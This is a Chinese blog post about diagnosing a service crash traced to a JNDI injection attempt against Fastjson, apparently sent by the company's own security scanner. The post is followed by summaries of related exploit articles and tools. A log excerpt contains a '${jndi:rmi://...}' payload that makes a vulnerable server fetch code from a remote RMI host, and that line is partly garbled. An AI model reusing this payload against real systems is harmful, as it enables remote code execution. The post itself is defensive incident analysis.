JNDI注入-FastJson漏洞结合、安扫攻击

最新推荐文章于 2025-08-09 18:35:14 发布
原创 最新推荐文章于 2025-08-09 18:35:14 发布 · 696 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 #运维

文章目录


以前不太知道jndi是什么,直到有一次服务挂了,看日志发现有类似请求,然后服务就挂了。

详细信息:
org.springframework.web.HttpMediaTypeNotAcceptableException: Could not parse ‘Accept’ header [
j n d i : r m i : / / 192.168.0.1 : 12346 / i / h c S v q I 7 U / 68465 c / 7 u q i / f w x v / P Q 5 P 8 i B h / ] : I n v a l i d m i m e t y p e " {jndi:rmi://192.168.0.1:12346/i/hcSvqI7U/68465c/7uqi/fwxv/PQ5P8iBh/}]: Invalid mime type " jndi:rmi://192.168.0.1:12346/i/hcSvqI7U/68465c/7uqi/fwxv/PQ5P8iBh/]:Invalidmimetype"{jndi:rmi://192.168.0.1:12346/i/hcSvqI7U/68465c/7uqi/fwxv/PQ5P8iBh/}": Invalid token character ‘{’ in token “${jndi:rmi:”

注:实际ip用192.168.0.1代替了啊,懂的都懂。
后来发现这个ip正是安扫的调用方,在模拟攻击请求。

一开始没太注意,有经验的队友见过这个问题,知道这个是jndi利用fastjson的漏洞进行注入。

todo 模拟一次实际的注入并造成服务挂掉

什么情况下需要注意

当有大量不认识的ip请求过来时,就要追查下ip的来源了。
发现服务挂掉同时伴随着大量的未知ip的骑牛,也是安扫的。

chushiyunen
关注
Java全篇-Fastjson漏洞
m0_63138919的博客
03-28 4383
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误
网络--Fastjson1.2.24-RCE漏洞
weixin_46066254的博客
12-04 745
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,autoType标注了类对应的原始类型,方便在反序列化的时候定位到具体类型,fastjson在对JSON字符串进行反序列化的时候,就会读取@type到内容,试图把JSON内容反序列化成这个对象,并且会调用这个类的setter方法。因为有了autoType功能,那么fastjson在对JSON字符串进行反序列化的时候,就会读取@type到内容,试图把JSON内容反序列化成这个对象,并且会调用这个类的setter方法。
JNDI注入-FastJson漏洞结合(详细原理版,小白也能看的懂)
qq_68064663的博客
09-14 727
javaee开发一个json转换功能,接受用户提交的JSON数据进行转换,转换的内容是ldap的远程执行class文件的地址,然后这个转换功能是用fastjson组件实现的,但是fastjson存在漏洞漏洞就是在json数据转换时产生的fastjson反序列化漏洞。含义解释:@type指向com.sun. rowset. JdbcRowSetImpl,对项目中的com.sun.rowset.路径下的JdbcRowSetImpl文件里面的数据进行转换,是运行计算器的功能,回显500弹出计算器。
从Log4j和Fastjson RCE漏洞认识jndi注入
道阻且长,行则将至
06-10 2262
本文学习了 JNDI 基本概念和 JNDI 注入的基本原理,并通过靶场实践 JNDI 注入漏洞的利用过程,与此同时学习了 Log4j RCE 漏洞(CVE-2021-44228)和 Fastjson 反序列化漏洞(CVE-2017-18349)的原理,并通过靶场实践借助 JNDI 注入完成 RCE 的过程。
Fastjson反序列化漏洞——JNDI注入
2301_79096184的博客
09-17 2349
JNDI注入
JNDI注入--Log4j漏洞--Fastjson反序列化漏洞
weixin_74985952的博客
09-21 515
Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。
fastjson漏洞 - Fastjson1.2.47反序列化漏洞
HAKUNAMATATATTA的博客
01-06 2960
Fastjson 是阿里巴巴公司开源的一款 JSON 解析器,它可以解析 JSON 格式的字符串,Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 Java Bean。
【入坑JAVA全】fastjson中的jndi注入
一个安全研究员
04-24 2670
我写的如何?
用marshalsec & Jndi注入利用工具(JNDI-Injection-Exploit)复现Fastjson反序列化漏洞--保姆级!复现过程!
2301_79837041的博客
04-11 3735
装maven环境后,更新完环境变量,但是每次使用mvn命令必须在source之后才能使用,我用的是kali,网上文章说在~./bash里面更新source /etc/profile 我试过了,没有用,最后是换在ubuntu系统里面装才成功的,目前还不知道为什么,有大佬知道可以告诉我一下。在fastjson中我们使用构造的json格式字符串进行反序列化的攻击,我们给指定类中的值输入恶意内容(rmi链接),让目标服务在反序列化的时候,请求rmi服务器,执行rmi服务器下发的命令,从而导致远程命令执行漏洞
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用...
jndi-tool JNDI服务利用工具
01-06
在某些版本的Fastjson中,存在远程代码执行(RCE)漏洞攻击者可以利用这个漏洞通过JNDI注入来执行恶意代码。 另一个涉及JNDI的高知名度漏洞是Log4j 2.x的CVE-2021-44228,也被称为“Log4Shell”漏洞。Log4j是一个...
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6629
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
避免“卡脖子”!如何减少内存I/O延迟对程序的影响?
pantouyuchiyu的博客
08-08 701
在计算机操作系统中,所谓的I/O就是 输入(Input)和输出(Output),也可以理解为读(Read)和写(Write),针对不同的对象,I/O模式可以划分为磁盘IO模型和网络IO模型。IO操作会涉及到用户空间和内核空间内存空间分为用户空间和内核空间,也称为用户缓冲区和内核缓冲区;用户的应用程序不能直接操作内核空间,需要将数据从内核空间拷贝到用户空间才能使用;无论是read操作,还是write操作,都只能在内核空间里执行;磁盘IO和网络IO请求加载到内存的数据都是先放在内核空间的;
客户端利用MinIO对服务器数据进行同步
heshouwu_1026的博客
08-07 492
本文介绍了MinIO对象存储服务的本地部署与同步管理方法。主要内容包括:1)通过命令行启动MinIO服务并配置访问端口;2)使用默认账号(minioadmin)登录Web管理界面;3) 通过mc客户端工具设置别名、创建访问密钥;4) 实现本地与MinIO存储桶的实时同步监控,支持断线重连和增量同步。文章还提供了Windows/Linux系统下的后台运行方案,确保同步任务持续执行。整个过程展示了MinIO作为轻量级对象存储解决方案的灵活部署和高效数据同步能力。
NAT转化和VRRP配置
不会写代码的胖子
08-06 349
VRRP(Virtual Router Redundancy Protocol)是一种网络协议,用于在多个路由器之间提供网关冗余,确保当主网关故障时能够自动切换到备份网关,从而提高网络可靠性。在router1和router2查看主备份信息。在router1配置VRRP。在router2配置vrrp。
Docker入门教程:在腾讯云轻量服务器上部署你的第一个容器化应用 (2025)
Clownseven的博客
08-07 765
还在为“在我电脑上明明是好的”而烦恼?本篇Docker入门教程,用通俗易懂的比喻解释镜像、容器的核心概念,并手把手带你在腾讯云轻量服务器上,从运行Nginx到编写Dockerfile打包自己的Python应用,轻松掌握容器化部署。
前端保持和服务器时间同步的方法【使用vue3举例】
qq_53002037的博客
08-05 832
轮询(定时请求服务器时间)、WebSocket、时间戳校正、 NTP(网络时间协议)、SSE(服务器发送事件)
海康威视摄像头实时推流到阿里云公网服务器(Windows + FFmpeg + nginx-rtmp)
最新发布
willem的博客
08-09 531
摘要: 本文详细介绍将海康威视摄像头视频流通过Windows电脑推送到阿里云服务器的完整方案。步骤包括:1)在阿里云ECS部署nginx-rtmp服务并开放端口;2)Windows端装FFmpeg,通过RTSP拉取摄像头流并转推RTMP协议;3)使用VLC或网页进行公网播放验证;4)通过nssm工具将推流程序注册为Windows服务实现长期运行。方案支持低延迟传输,提供常见问题排查方法和一键脚本,适用于7×24小时监控场景,最终实现公网多终端访问摄像头视频流。
3a服务器的基本功能1之身份认证
2401_82643465的博客
08-07 296
搭建拓扑图:防火墙e0/0自动获取ip,e0/1IP10.2.2.1/24,e0/2 IP:192.168.100.1做网关根据要求配置IP:首先配置上网的源nat因为没有等保要求我们配置简单的any就行然后配置相关策略来实现内外网互通,内网能上外网,内网能被服务器管理,外网能访问服务器。创建用户先做就简单的web认证服务,不要忘了去策略上外网部分的那一条策略上设置上网认证。设置完用户和在nat设置用户认证后,我们内网上网就要身份认证才可以了,输入设好的账号密码在可以正常上网后我们把认证方式改为radius
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值